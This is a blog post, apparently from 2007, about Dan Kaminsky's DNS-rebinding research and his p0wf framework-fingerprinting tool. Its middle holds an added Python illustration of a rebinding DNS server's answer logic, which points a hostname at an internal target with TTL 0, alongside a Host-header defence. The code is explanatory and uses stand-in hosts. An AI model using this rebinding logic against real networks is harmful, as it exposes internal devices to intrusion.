I’ve been a longtime fan of fellow hacker Dan Kaminsky, best known for his work in tracking down the spread of the Sony rootkit. Recently I spoke with him about his current work, and he summed it up by saying, “I can turn your web browser into a VPN concentrator.” When I stared at him in disbelief, he explained that using DNS rebinding he can get the browser to connect to any IP he chooses.
I will demonstrate an extension of RSnake and Boneh’s work that grants full IP connectivity, by design, to any attacker who can lure a web browser to render his page.
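To make the mechanism concrete, here is an added example (my own illustration, not Dan’s code or anything from his talk) of the DNS side of a rebinding attack and the check a target service can use against it. The attacker-controlled authoritative server answers the first A query for its name with the attacker’s own web server, so the victim loads the attacker’s page; every later query gets the internal target’s address with TTL 0, so when the page’s script re-resolves the same hostname, the browser’s same-origin policy now lets it talk to the internal host. The hostname `attacker.example`, the IPs `203.0.113.10` and `192.168.1.1`, and the query packet are constructed assumptions for the demo.

```python
import socket
import struct

ATTACKER_IP = "203.0.113.10"  # assumption: attacker's public web server (TEST-NET-3)
TARGET_IP = "192.168.1.1"     # assumption: device on the victim's internal network


class RebindingResolver:
    """Answer policy of the attacker's authoritative DNS server.

    The first A query from a given source (in practice the victim's recursive
    resolver) gets the attacker's web server so the page loads; all later
    queries from that source get the internal target. TTL 0 asks the client
    not to cache, so the browser re-resolves and "attacker.example" now
    points inside the victim's network while the origin string is unchanged.
    """

    def __init__(self, attacker_ip, target_ip):
        self.attacker_ip = attacker_ip
        self.target_ip = target_ip
        self.seen = set()

    def answer(self, source, qname):
        if source in self.seen:
            return self.target_ip
        self.seen.add(source)
        return self.attacker_ip


def build_query(txid, name):
    """Wire-format A query (RD set, one question, IN class)."""
    header = struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)


def parse_query(pkt):
    """Return (txid, name, qtype, raw question section) from a DNS query."""
    txid, _flags, _qd, _an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    off, labels = 12, []
    while True:
        ln = pkt[off]
        off += 1
        if ln == 0:
            break
        labels.append(pkt[off:off + ln].decode())
        off += ln
    qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, ".".join(labels), qtype, pkt[12:off + 4]


def build_response(txid, question, ip, ttl=0):
    """Response echoing the question plus one A record with the given TTL.

    0xC00C is a compression pointer back to the name at offset 12."""
    header = struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0)
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + rr


def parse_response(pkt):
    """Return (txid, ip, ttl) from a single-answer A response built above."""
    txid = struct.unpack("!H", pkt[:2])[0]
    off = 12
    while pkt[off] != 0:            # skip the question name labels
        off += 1 + pkt[off]
    off += 1 + 4                    # terminating zero, QTYPE, QCLASS
    off += 2                        # answer name (compression pointer)
    _rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    return txid, socket.inet_ntoa(pkt[off:off + rdlen]), ttl


def host_header_allowed(host_header, own_names):
    """Defense on the internal service: a rebound request still carries the
    attacker's hostname in the HTTP Host header, because the browser thinks
    it is talking to attacker.example. A server that only accepts its own
    names or addresses refuses it. Port and IPv6 brackets are stripped."""
    host = host_header.strip().lower()
    if host.startswith("["):
        host = host[1:host.index("]")]
    else:
        host = host.split(":", 1)[0]
    return host in {n.lower() for n in own_names}


if __name__ == "__main__":
    resolver = RebindingResolver(ATTACKER_IP, TARGET_IP)
    query = build_query(0x1234, "attacker.example")
    txid, name, qtype, question = parse_query(query)
    for step in ("page load", "XMLHttpRequest after re-resolution"):
        ip = resolver.answer("198.51.100.53", name)   # constructed recursive resolver IP
        print(step, "->", parse_response(build_response(txid, question, ip)))
    print("Host: attacker.example accepted by router?",
          host_header_allowed("attacker.example", {"192.168.1.1", "router.local"}))
```

Two caveats a practitioner should keep in mind: browsers and resolvers do not always honour a TTL of 0, so the real attack has to deal with DNS pinning rather than rely on the TTL alone; and the Host header check only protects services that enforce it, which is why the talk’s point about the browser becoming a general IP relay matters for everything on the internal network that does not.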
I have had for a while a lurking feeling that the Web 2.0 world is full of surprising attack vectors that no one has gotten around to exploiting. Work like this doesn’t exactly fill me with confidence that the environment is secure.
If you have ever wondered what framework a certain site uses, Dan also gives us p0wf.
But the web has become almost an entirely separate OS layer of its own, and especially with AJAX and Web 2.0, new forms of RPC and marshalling are showing up faster than anyone can identify. p0wf intends to analyze these streams and determine just which frameworks are being exposed on what sites.
I am really happy Dan is on our side.
** Update 6:03 PM PST **
Megginson Technologies has more details and how it can affect you.
** Update 6:00 PM Thursday, August 2 **
Dan finally posted his slides. He also discusses breaking audio CAPTCHAs and busting provider hostility, the opposite of network neutrality.